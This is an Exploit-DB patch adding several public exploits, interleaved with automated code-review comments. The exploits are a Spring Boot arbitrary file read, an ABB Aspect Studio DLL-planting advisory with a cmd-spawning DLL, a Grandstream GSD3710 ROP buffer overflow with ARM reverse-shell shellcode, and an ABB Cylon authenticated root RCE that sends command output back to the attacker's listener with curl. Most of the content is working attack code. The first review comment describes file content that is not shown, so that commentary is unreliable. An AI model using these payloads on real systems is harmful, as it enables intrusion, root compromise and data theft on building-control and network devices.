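Review bot: The harness comments switch language near the end: `# Alloco memoria eseguibile per lo shellcode`, `# Metto lo shellcode nel buffer ...`, `# Copio lo shellcode nella memoria allocata` and `# Eseguo lo shellcode in un nuovo thread, su cui faccio la join` are Italian while the rest of the file is English; rewriting them as `# Allocate executable memory for the shellcode`, `# Wrap the shellcode in a ctypes buffer`, `# Copy the shellcode into the allocated memory` and `# Run the shellcode on a new thread and wait for it` keeps the file consistent. The header's `# Note: You will have to modify the line 193 of this file` pins a line number that drifts with any edit; naming the label instead (`the mov r9, ... under call_connect`) is stable. The stray `# E` comment after the opcode print looks like a leftover, and `keystone` is a third-party dependency the header does not mention; a `# Requires: keystone-engine` line next to the other metadata would help.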
From: Exploit-DB Date: Mon, 26 May 2025 00:16:29 +0000 Subject: [PATCH 4/6] DB: 2025-05-26 8 changes to exploits/shellcodes/ghdb Java-springboot-codebase 1.1 - Arbitrary File Read ABB Cylon Aspect Studio 3.08.03 - Binary Planting ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass Microsoft Windows Server 2016 - Win32k Elevation of Privilege Windows 2024.15 - Unauthenticated Desktop Screenshot Capture --- exploits/java/webapps/52304.py | 57 +++ exploits/multiple/local/52306.txt | 111 +++++ exploits/multiple/remote/52303.py | 247 ++++++++++++ exploits/multiple/remote/52305.py | 281 +++++++++++++ exploits/multiple/webapps/52302.py | 65 +++ exploits/windows/local/52301.c | 623 +++++++++++++++++++++++++++++ exploits/windows/remote/52300.py | 61 +++ files_exploits.csv | 7 + 8 files changed, 1452 insertions(+) create mode 100755 exploits/java/webapps/52304.py create mode 100644 exploits/multiple/local/52306.txt create mode 100755 exploits/multiple/remote/52303.py create mode 100755 exploits/multiple/remote/52305.py create mode 100755 exploits/multiple/webapps/52302.py create mode 100644 exploits/windows/local/52301.c create mode 100755 exploits/windows/remote/52300.py diff --git a/exploits/java/webapps/52304.py b/exploits/java/webapps/52304.py new file mode 100755 index 000000000..f60cbd628 --- /dev/null +++ b/exploits/java/webapps/52304.py 
@@ -0,0 +1,57 @@ +# Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read +# Google Dork: +# Date: 23/May/2025 +# Exploit Author: d3sca +# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase +# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase +# Version: [app version] 1.1 +# Tested on: Debian Linux +# CVE : CVE-2025-46822 + +#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd + +import argparse +import requests + +from urllib.parse import quote +def exploit(target, file_path, output=None): + # Ensure the file path is absolute + if not file_path.startswith('/'): + print("[!] Warning: File path is not absolute. Prepending '/' to make it absolute.") + file_path = '/' + file_path.lstrip('/') + + # URL-encode the file path + encoded_path = quote(file_path, safe='') + + # Construct the target URL + endpoint = f"/api/v1/files/{encoded_path}" + url = target.rstrip('/') + endpoint + print(f"[*] Attempting to retrieve: {file_path}") + print(f"[*] Sending request to: {url}") + try: + response = requests.get(url, allow_redirects=False, timeout=10) + + if response.status_code == 200: + print("[+] File retrieved successfully!") + if output: + with open(output, 'wb') as f: + f.write(response.content) + print(f"[+] Content saved to: {output}") + else: + print("\nFile contents:") + print(response.text) + else: + print(f"[-] Failed to retrieve file. 
Status code: {response.status_code}") + print(f"[-] Response: {response.text[:200]}") # Show first 200 chars of response + except Exception as e: + print(f"[-] An error occurred: {str(e)}") + +if name == "main": + parser = argparse.ArgumentParser(description="Exploit Path Traversal Vulnerability in Unauthenticated File API") + parser.add_argument("target", help="Target base URL (e.g., http://victim:8080)") + parser.add_argument("file_path", help="Absolute path to target file (e.g., /etc/passwd)") + parser.add_argument("-o", "--output", help="Output file to save contents") + + args = parser.parse_args() + + exploit(args.target, args.file_path, args.output) \ No newline at end of file diff --git a/exploits/multiple/local/52306.txt b/exploits/multiple/local/52306.txt new file mode 100644 index 000000000..d998d9558 --- /dev/null +++ b/exploits/multiple/local/52306.txt 
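Review bot: The guard `if name == "main":` references plain `name` and `"main"` rather than `__name__` and `"__main__"`, so as committed the module raises `NameError` at import and the guard never runs; this reads like underscores lost in a markdown round-trip rather than intent, but the committed file is what readers will copy. The usage comment `#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd` names a file that differs from the committed `52304.py`; either say `python3 52304.py ...` or note the original filename. The bare `except Exception as e` around the request hides the exception type; `except requests.RequestException as e` keeps unexpected errors visible while still reporting network failures.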
@@ -0,0 +1,111 @@ +# Exploit Title: ABB Cylon Aspect Studio 3.08.03 - Binary Planting +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: <=3.08.03 +# Tested on: Microsoft Windows 10 Home (EN) OpenJDK 64-Bit Server VM Temurin-21.0.6+7 +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience + +# Advisory ID: ZSL-2025-5952 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php + +# CVE ID: CVE-2024-13946 +# CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946 + +C:\> type project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll +C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat +REM 64bit parameters +jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. 
-DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar + +C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat + +C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters + +C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar + + +C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class +... +... +System.loadLibrary("CylonLicence"); +} catch (Throwable t) {} +LoggerUtil.logger.error("Error loading license DLL", t); +} +} +... +... 
+ +C:\Aspect\Aspect-Studio-3.08.03> cd logs +C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log + +ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main] +java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path + at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867) + at java.lang.Runtime.loadLibrary0(Runtime.java:870) + at java.lang.System.loadLibrary(System.java:1122) + at com.aamatrix.util.AspectStudio.(AspectStudio.java:42) + at com.aamatrix.vib.rrobin.CylonLicense.(CylonLicense.java:18) + at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:38) + at com.aamatrix.vib.rrobin.LicenseService.(LicenseService.java:34) + at com.aamatrix.projectmanager.AspectStudio.(AspectStudio.java:52) + at java.lang.Class.forName0(Native Method) + at java.lang.Class.forName(Class.java:348) + at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70) + ... + ... + +C:\DLL-Mala> type CylonLicence.cpp + +#define WIN32_LEAN_AND_MEAN +#include +#include + + +extern "C" __declspec(dllexport) +DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) { + ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL); + return 0; +} + +extern "C" __declspec(dllexport) +BOOL APIENTRY DllMain(HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved) { + switch (ul_reason_for_call) { + case DLL_PROCESS_ATTACH: + CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} \ No newline at end of file diff --git a/exploits/multiple/remote/52303.py b/exploits/multiple/remote/52303.py new file mode 100755 index 000000000..4ba4c6c12 --- /dev/null +++ b/exploits/multiple/remote/52303.py 
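Review bot: The advisory shows the root cause clearly (`System.loadLibrary("CylonLicence")` resolved through `-Djava.library.path=.` in `aspect.bat`, with `UnsatisfiedLinkError: no CylonLicence in java.library.path` logged in `AspectStudio.log`), but it has no fix or mitigation line, which is the first thing a defender reading ZSL-2025-5952 / CVE-2024-13946 needs. A `# Mitigation:` line such as `ship the licence DLL (or load it by absolute path) so the lookup cannot fall through to a planted file, and restrict write access to the Aspect Studio install directory` would close that gap. The `catch (Throwable t) {}` in the excerpted `AspectStudio.class` (as reproduced here the `LoggerUtil.logger.error` call sits after the catch block, so the excerpt may be garbled) means a failed or substituted load does not stop the application, which is worth stating explicitly in the description.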
@@ -0,0 +1,247 @@ +#!/usr/bin/env python3 + +# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow +# Google Dork: [if applicable] +# Date: 2025-05-23 +# Exploit Author: Pepelux (user in ExploitDB) +# Vendor Homepage: https://www.grandstream.com/ +# Software Link: [download link if available] +# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower +# Tested on: Linux and MacOS +# CVE: CVE-2022-2070 + +""" +Author: Jose Luis Verdeguer (@pepeluxx) + +Required: Pwntools + +Example: + +Terminal 1: +$ ncat -lnvp 4444 + +Terminal 2: +$ python 3 CVE-2020-2070.py -ti DEVICE_IP -tp 8081 -ri LOCAL_IP -rp 4444 +""" + +from operator import ge +import sys +import time +from pwn import * + +import argparse + + +def get_args(): + parser = argparse.ArgumentParser( + formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter( + prog, max_help_position=50)) + + # Add arguments + parser.add_argument('-ti', '--target_ip', type=str, required=True, + help='device IP address', dest="device_ip") + parser.add_argument('-tp', '--target_port', type=int, required=True, default=8081, + help='device port', dest="device_port") + parser.add_argument('-ri', '--reverse_ip', type=str, required=True, + help='reverse IP address', dest="reverse_ip") + parser.add_argument('-rp', '--reverse_port', type=int, required=True, + help='reverse port', dest="reverse_port") + + # Array for all arguments passed to script + args = parser.parse_args() + + try: + TI = args.device_ip + TP = args.device_port + RI = args.reverse_ip + RP = args.reverse_port + + return TI, TP, RI, RP + except ValueError: + exit() + + +def check_badchars(data): + for i in range(len(data)): + if data[i] in [0x0, 0x40]: + log.warn("Badchar %s detected at %#x" % (hex(data[i]), i)) + return True + return False + + +def get_shellcode(ip, port): + ip_bytes = socket.inet_aton(ip) + port_bytes = struct.pack(">H", port) + + # Linux ARM reverse shell + + # switch to thumb mode + sc = b"\x01\x30\x8F\xE2" # add r3, pc, 
#1 + sc += b"\x13\xFF\x2F\xE1" # bx r3 + + # socket(2, 1, 0) + sc += b"\x02\x20" # movs r0, #2 + sc += b"\x01\x21" # movs r1, #1 + sc += b"\x92\x1A" # subs r2, r2, r2 + sc += b"\xC8\x27" # movs r7, #0xc8 + sc += b"\x51\x37" # adds r7, #0x51 + sc += b"\x01\xDF" # svc #1 + sc += b"\x04\x1C" # adds r4, r0, #0 + + # connect(r0, &sockaddr, 16) + sc += b"\x0C\xA1" # adr r1, #0x30 + sc += b"\x4A\x70" # strb r2, [r1, #1] + sc += b"\x10\x22" # movs r2, #0x10 + sc += b"\x02\x37" # adds r7, #2 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 0) + sc += b"\x3F\x27" # movs r7, #0x3f + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x49\x1A" # subs r1, r1, r1 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 1) + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x01\x21" # movs r1, #1 + sc += b"\x01\xDF" # svc #1 + + # dup2(sockfd, 2) + sc += b"\x20\x1C" # adds r0, r4, #0 + sc += b"\x02\x21" # movs r1, #2 + sc += b"\x01\xDF" # svc #1 + + # execve("/bin/sh") + sc += b"\x06\xA0" # adr r0, #0x18 + sc += b"\x92\x1A" # subs r2, r2, r2 + sc += b"\x49\x1A" # subs r1, r1, r1 + sc += b"\x01\x91" # str r1, [sp, #4] + sc += b"\x02\x91" # str r1, [sp, #8] + sc += b"\x01\x90" # str r0, [sp, #4] + sc += b"\x01\xA9" # add r1, sp, #4 + sc += b"\xC2\x71" # strb r2, [r0, #7] + sc += b"\x0B\x27" # movs r7, #0xb + sc += b"\x01\xDF" # svc #1 + + sc += b"\x02\xFF" + sc += port_bytes + sc += ip_bytes + sc += b"/bin/shX" + + return sc + + +def main(): + ti, tp, ri, rp = get_args() + + # ROP Gadgets + + libc_base = 0x76ec1000 + + mprotect = libc_base + 0x93510+1 + pop_lr = libc_base + 0x1848C # pop {r0, r4, r8, ip, lr, pc} + pop_pc = libc_base + 0xd7515 # pop {pc} + pop_r0 = libc_base + 0x00064bb0+1 # 0x00064bb0 : pop {r0, pc} + + pop_r5 = libc_base + 0x00003738+1 # 0x00003738 : pop {r5, pc} + add_r1_sp = libc_base + 0x000b3c4e+1 # 0x000b3c4e : add r1, sp, #0x14 ; blx r5 + # 0x0002f83c (0x0002f83d): mov r0, r1; bx lr + mov_r0_r1 = libc_base + 0x0002f83d + # 0x0006a086 (0x0006a087): pop {r1, pc} + pop_r1 = 
libc_base + 0x6a087 + ands_r0_r1 = libc_base + 0x1feba+1 # 0x0001feba : ands r0, r1 ; bx lr + # 0x000a3a42 : movs r4, r0 ; pop {r1, pc} + mov_r4_r0 = libc_base + 0x000a3a42+1 + # 0x0001fdae (0x0001fdaf): movs r1, r0; bx lr + movs_r1_r0 = libc_base + 0x0001fdaf + + and_r0_f = libc_base + 0x8717e+1 # 0x0008717e : and r0, r0, #0xf ; bx lr + movs_r2_r0 = libc_base + 0x0001fc6a+1 # 0x0001fc6a : movs r2, r0 ; bx lr + mov_r0_r4 = libc_base + 0x0001f9d4+1 # 0x0001f9d4 : movs r0, r4 ; bx lr + blx_sp = libc_base + 0x46595 # 0x00046594 (0x00046595): blx sp + + shellcode = get_shellcode(ri, rp) + + auth_command = b"LOG/1.0 END CMD:AUTH_USERNAME @" + junk = p32(0x43434343) + + payload = auth_command + payload += b"A" * 144 + + # The goal is that R0 -> SP + + # R5 = pop {pc} + # because in the the next gadget we have a blx r5 + payload += p32(pop_r5) + payload += p32(pop_pc) # R5 = pop {pc} + + # R1 = SP ; BLX pop {pc} + payload += p32(add_r1_sp) # add r1, sp, #0x14 ; blx r5 + + # Restore LR register (because it has been updated by the last BLX gadget) + payload += p32(pop_lr) # pop {r0, r4, r8, ip, lr, pc} + payload += junk*4 # r0, r4, r8, ip + payload += p32(pop_pc) # LR = pop {pc} + + # R0 = stack address + payload += p32(mov_r0_r1) # mov r0, r1; bx lr + + # R1 = mask page align + payload += p32(pop_r1) # pop {r1, pc} + payload += p32(0xfffe1001) + + # R0 = stack address & 0xfffe1001 + payload += p32(ands_r0_r1) # ands r0, r1 ; bx lr + # R4 = R0 + payload += p32(mov_r4_r0) # movs r0, r4 ; bx lr + payload += junk # r1 + + # mprotect params + # r0 = shellcode page aligned address + # r1 = size(ofshellcode) + # r2 = protection (0x7 – RWX) + + # R2 = 0x7 + payload += p32(pop_r0) + payload += p32(0x07070707) + payload += p32(and_r0_f) # R0 = 7 (RWX) + payload += p32(movs_r2_r0) # R2 (prot: 7 - RWX) + + # R1 = length = 0x10101010 (avoid 0's) + payload += p32(pop_r0) + payload += p32(0x01010101) + payload += p32(movs_r1_r0) # r1 (length: 0x10101010) + + # R0 = stack address 4k 
aligned + payload += p32(mov_r0_r4) + + # mprotect(stack, 0x10101010, 0x7) + payload += p32(mprotect) + payload += p32(blx_sp) # ejecutamos en pila + payload += shellcode # shellcode + + if check_badchars(payload[len(auth_command):]): + sys.exit(0) + + log.info("Device IP: %s:%d" % (ti, tp)) + log.info("Attacker IP: %s:%d" % (ri, rp)) + log.info("Payload len: %d" % len(payload)) + + count = 1 + + while True: + try: + print('Try: %d' % count) + r = remote(ti, tp) + r.send(payload) + log.success("Payload sent!") + # r.close() + time.sleep(1) + count += 1 + except: + sleep(3) + pass + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52305.py b/exploits/multiple/remote/52305.py new file mode 100755 index 000000000..829ff225e --- /dev/null +++ b/exploits/multiple/remote/52305.py 
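Review bot: The module docstring's usage example is out of step with the header at the top of the hunk — it invokes `python 3 CVE-2020-2070.py` while the `# CVE:` line says CVE-2022-2070 and the file itself is committed as 52303.py; `$ python3 52303.py -ti DEVICE_IP -tp 8081 -ri LOCAL_IP -rp 4444` would match. In `get_args`, `-tp` is declared with both `required=True` and `default=8081`, so the default can never apply; keep one or the other. `from operator import ge` is unused and can go. For anyone writing a detection rule, the constant `LOG/1.0 END CMD:AUTH_USERNAME @` prefix followed by a long run of filler bytes on the port-8081 service is the stable part of what this script sends.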
@@ -0,0 +1,281 @@ +#!/usr/bin/env python +# +# +# Exploit Title: ABB Cylon Aspect 3.08.03 - Guest2Root Privilege Escalation +# +# +# Vendor: ABB Ltd. +# Product web page: https://www.global.abb +# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio +# Firmware: <=3.08.03 +# +# Summary: ASPECT is an award-winning scalable building energy management +# and control solution designed to allow users seamless access to their +# building data through standard building protocols including smart devices. +# +# Desc: The ABB BMS/BAS controller is vulnerable to code execution and sudo +# misconfiguration flaws. An authenticated remote code execution vulnerability +# in the firmware update mechanism allows an attacker with valid credentials to +# escalate privileges and execute commands as root. The process involves uploading +# a crafted .bsx file through projectUpdateBSXFileProcess.php, which is then moved +# to htmlroot and executed by projectUpdateBSXExecute.php. This script leverages +# sudo to run the uploaded bsx file, enabling the attacker to bypass input validation +# checks and execute arbitrary code, leading to full system compromise and unauthorized +# root access. +# +# --------------------------------------------------------------------------------- +# +# $ ./bsxroot.py 192.168.73.31 192.168.73.9 --creds guest:guest +# [o] Exploit starting at 21.05.2025 12:33:47 +# [o] Using credentials: guest:***** +# [o] Auth successfull. +# [o] PHPSESSID: g02p9tnog4d2r1z4eha1e9e688 +# [o] Listening on 192.168.73.9:5555... +# [o] Building name: ["Tower 3"] +# [o] runtime.ver=v3.08.03 +# [+] -> [virtual] rootshell +# +# # id +# uid=0(root) gid=0(root) groups=0(root) +# # pwd +# /home/MIX_CMIX/htmlroot +# exit +# [o] Removing callback file. +# [!] Connection terminated. 
+# +# --------------------------------------------------------------------------------- +# +# +# Tested on: GNU/Linux 3.15.10 (armv7l) +# GNU/Linux 3.10.0 (x86_64) +# GNU/Linux 2.6.32 (x86_64) +# Intel(R) Atom(TM) Processor E3930 @ 1.30GHz +# Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz +# PHP/7.3.11 +# PHP/5.6.30 +# PHP/5.4.16 +# PHP/4.4.8 +# PHP/5.3.3 +# AspectFT Automation Application Server +# lighttpd/1.4.32 +# lighttpd/1.4.18 +# Apache/2.2.15 (CentOS) +# OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) +# OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2025-5947 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5947.php +# +# +# 21.04.2024 +# +# + +from colorama import init, Fore +from urllib.parse import quote +from time import sleep +import threading +import datetime +import requests +import socket +import re +import os +import sys + +init() + +def safe(*trigger, ): + return True + +def auth(target_ip, user, pwd): + login_ep = f"http://{target_ip}/validate/login.php" + payload = { + 'f_user' : user, # 'aamuser, guest' + 'f_pass' : pwd, # 'default, guest' + 'submit' : 'Login' + } + sess = requests.Session() + r = sess.post(login_ep, data=payload) + if r.status_code == 200 and 'PHPSESSID' in sess.cookies: + print("[o] Auth successfull.") + phpsessid = sess.cookies.get('PHPSESSID') + print("[o] PHPSESSID:", phpsessid) + return sess.cookies + else: + print("[!] 
Auth failed.") + return None + +def kacuj(target_ip, listen_ip, cmd, token=None, cookies=None): + agentwho = "NetRanger/84.19" + payload = f"curl -A \"`{cmd}`\" {listen_ip}:5555" + url = f"http://{target_ip}/projectUpdateBSXFileProcess.php" + + headers = { + "Content-Type": "multipart/form-data; boundary=----zeroscience", + "User-Agent": agentwho + } + data = ( + "------zeroscience\r\n" + f"Content-Disposition: form-data; name=\"userfile\"; filename={AAM}\r\n" + "Content-Type: application/octet-stream\r\n\r\n" + f"{payload}\r\n" + '------zeroscience--\r\n' + ) + try: + r = requests.post(url, headers=headers, data=data, cookies=cookies) + if r.status_code == 200: + url_execute = f"http://{target_ip}/projectUpdateBSXExecute.php?file={AAM}" + r = requests.get(url_execute, cookies=cookies) + + return r.content + + except requests.exceptions.RequestException as e: + print(f"[!] Error sending payload: {e}") + + return None + +def koj_slusha(listen_ip): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + s.bind(("0.0.0.0", 5555)) + s.listen(1) + + print(f"[o] Listening on {listen_ip}:5555...") + + while True: + conn, addr = s.accept() + try: + data = conn.recv(9999) + if not data: + print("[!] Connection closed by remote host.") + break + dd = data.decode("utf-8", errors="ignore") + uam = re.search(r"User-Agent:\s*(.*)\s*Host:", dd, re.DOTALL) + if uam: + print(uam.group(1), end="") + else: + print + #print(f"[o] Full response:\n{dd}") + except Exception as e: + print(f"[!] 
Error while receiving data: {e}") + finally: + conn.close() + +def main(): + if safe(True): + print("\nSafety: \033[92mON\033[0m") + exit(-17) + else: + next + + global AAM + global start + AAM = "firmware.bsx" + + start = datetime.datetime.now() + start = start.strftime("%d.%m.%Y %H:%M:%S") + title = "\033[96mABB Cylon® ASPECT® Supervisory Building Control v3.08.03\033[0m" + subtl = "\033[95m\t\t-> Remote Root Exploit <-\033[0m" + prj = f""" + P R O J E C T\033[90m + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ +\033[0m + {title} + {subtl} + """ + if len(sys.argv) < 4: + print(prj) + print("./bsxroot.py ") + sys.exit(-0) + + target_ip = sys.argv[1] + listen_ip = sys.argv[2] + auth_arg = sys.argv[3] + + print("[o] Exploit starting at", start) + + if "--creds" in sys.argv: + creds_index = sys.argv.index("--creds") + 1 + if creds_index >= len(sys.argv): + print("[!] Error: Missing credentials after --creds.") + sys.exit(-1) + + user_pass = sys.argv[creds_index] + if ":" not in user_pass: + print("[!] Error: Invalid credentials format. 
Expected format: user:pass.") + sys.exit(-2) + + user, pwd = user_pass.split(":") + print(f"[o] Using credentials: {user}:{'*' * len(pwd)}") + cookies = auth(target_ip, user, pwd) + else: + token = auth_arg + cookies = {"PHPSESSID": token} + if not cookies: + sys.exit(-3) + + nishka = threading.Thread(target=koj_slusha, args=(listen_ip,)) + nishka.daemon = True + nishka.start() + + bacname = f"http://{target_ip}/getApplicationNamesJS.php" + r = requests.get(bacname) + if r.status_code == 200: + try: + r = r.content + decor = r.decode("utf-8") + except UnicodeDecodeError: + decor = r.decode("utf-8", errors="ignore") + + odg = re.search(r"var instanceDirectory=(.*?);", decor) + if odg: + cmd = "echo -ne \"[o] \" ; cat runtime/release.properties | grep -w 'runtime.ver'" + print("[o] Building name:", odg.group(1)) + kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies) + print("\033[92m[+] -> [virtual] rootshell\033[0m\n") + else: + print("[o] Unknown building name.") + sleep(0.01) + + while True: + sleep(0.01) + cmd = input("# ") + if cmd.lower() in ["exit", "quit"]: + print("[o] Removing callback file.") + kacuj(target_ip, listen_ip, "rm /tmp/" + AAM, token=None, cookies=cookies) + print("\033[91m[!] Connection terminated.\033[0m") + os._exit(-17) + + kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies) + + nishka.join() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52302.py b/exploits/multiple/webapps/52302.py new file mode 100755 index 000000000..20036eeb6 --- /dev/null +++ b/exploits/multiple/webapps/52302.py 
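Review bot: Two branches in this hunk are no-op expression statements rather than calls — `else: print` in `koj_slusha` and `else: next` at the top of `main` — and since the file uses f-strings it only runs on Python 3, where a bare `print` evaluates the function object and does nothing; either drop the `else` arms or write `print()` / `pass`. `koj_slusha` binds to `0.0.0.0` but reports `Listening on {listen_ip}:5555`, so the log line understates the exposure of the callback socket; `s.bind((listen_ip, 5555))` would make the message truthful and keep the listener off other interfaces. `user, pwd = user_pass.split(":")` raises on unpack when the password itself contains a colon; `user_pass.split(":", 1)` is the usual form. The `token` parameter of `kacuj` is never read.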
